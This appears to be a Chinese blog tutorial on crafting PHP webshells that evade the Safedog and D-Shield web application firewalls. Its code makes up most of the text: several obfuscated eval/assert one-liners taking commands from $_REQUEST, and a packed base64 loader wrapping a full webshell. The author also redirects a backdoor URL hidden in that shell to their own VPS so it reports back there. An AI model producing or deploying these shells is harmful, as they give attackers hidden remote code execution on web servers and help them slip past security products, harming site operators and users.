前言

最近在研究php免杀绕过安全狗、D盾等WAF防护软件。也算是小有成绩。故记录下来。

一句话木马

在渗透测试中最常用的就是一句话后门（小马）和中国菜刀的配合。如果出现某种WAF防护，就寻找一个免杀的大马挂马。
最常见的php一句话木马

<?php  @eval($_POST['x']);?>

这个一句话木马由两部分组成，eval用来执行接收的代码。$_POST['x']来接收数值。
本着这个原则，尝试改写一句话木马绕过WAF。
搜集了几个常用的php函数
执行代码的eval、assert、preg_replace
接收数据的$_POST、$_GET、$_REQUEST

php一句话免杀

str_rot13函数

<?php
$c=str_rot13('nffreg');
$c($_REQUEST['x']);
?>

str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。
测试发现无法绕过安全狗。修改一下。

<?php
function xiaoma($a){
    $c=str_rot13('nffreg');
    $c($a);
}
xiaoma($_REQUEST['x']);
?>

即可绕过安全狗。

<?php
class One{
    function xiaoma($x){
    $c=str_rot13('n!ff!re!nffreg');
    $str=explode('!',$c)[3];
    $str($x);
    }
}
$test=new One();
$test->xiaoma($_REQUEST['x']);
?>

再次修改，加了explode函数分割字符串，class封装类。可绕过D盾。

array_map函数

array_map() 函数将函数作用到数组中的每个值上，并返回一个新的数组。

<?php
$a1=array("1234","123456");
$a2=array(@$_REQUEST['x'],"1234");
$a=array_map(null,$a1,$a2)[0][1];
assert($a);
?>

即可绕过安全狗。

array_key函数

array_key() 函数也是返回包含数组的一个新数组。

<?php
$a=array($_REQUEST['x']=>"3");
$b=array_keys($a)[0];
eval($b);
?>

索引数组变化为关联数组。
即可绕过安全狗、D盾。

preg_replace函数

用来正则匹配的一个函数。

<?php
function func(){
    return $_REQUEST['x'];
}
preg_replace("/test/e",func(),"i am test");
?>

/e用来当做php代码解析。5.6版本以下实用。
测试可绕过安全狗和D盾。

preg_filter函数

根据preg_replace修改为preg_filter函数，也是用来执行正则的匹配替换。

<?php
$a=preg_filter('/\s+/','','as s er t');
$a($_REQUEST['x']);
?>

也可以绕过D盾、安全狗。

其他

<?php
function test($a){
    $arr = array('a','s','s','e','r','t');
    $func = '';
    for($i=0;$i<count($arr);$i++) {
        $func.=$func.$arr[$i];
    }
    $func=substr($func,-6);
    $func($a);
}
test($_REQUEST['x']);
?>

也可以绕过D盾、安全狗。

image.png

php免杀大马

正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。
将大马eval函数变为exit或者echo。burp抓取源代码。

image.png

image.png

将源代码拷贝下来，审计发现给源码存在一处后门。

image.png

base64解码一下

image.png

哦！！！真是可以。
将该base64地址修改为自己的vps地址。嘻嘻。
那现在只要eval函数可以执行这传base64的字符串就可以啦。
WAF对base64_encode、base64_decode查杀非常严格。
不断搜索、修改、编写，最终成功。

<?php
header("Content-type: text/html; charset=utf-8");
class one{
    public function dama(){
        $l='base';
        $o='64_de';
        $v='co';
        $e='de';
        $love=$l.$o.$v.$e;
        $c="love";
        $shellname='网站安全检测';
        $password='xxx';
        $myurl='http://www.xxx.com';
        $a=$$c('code');//php源码
        @eval($a);
    }
}
$person = new one;
$person->dama();
?>

直接将php大马源码放在code处。即可。
也可以改造php免杀一句话木马。
比如这款

<?php
header("Content-type: text/html; charset=utf-8");
function test($code){
    $password='xxx';
    $a=preg_filter('/\s+/','','base 64 _ deco de');
    $c=$a($code);
    @eval($c);
}
$code='';   //code存放php大马
test($code);
?>

访问一下。

image.png

查看vps是否接收到。

image.png

参考资料：
PHP一句话木马之小马
PHP免杀大马的奇淫技巧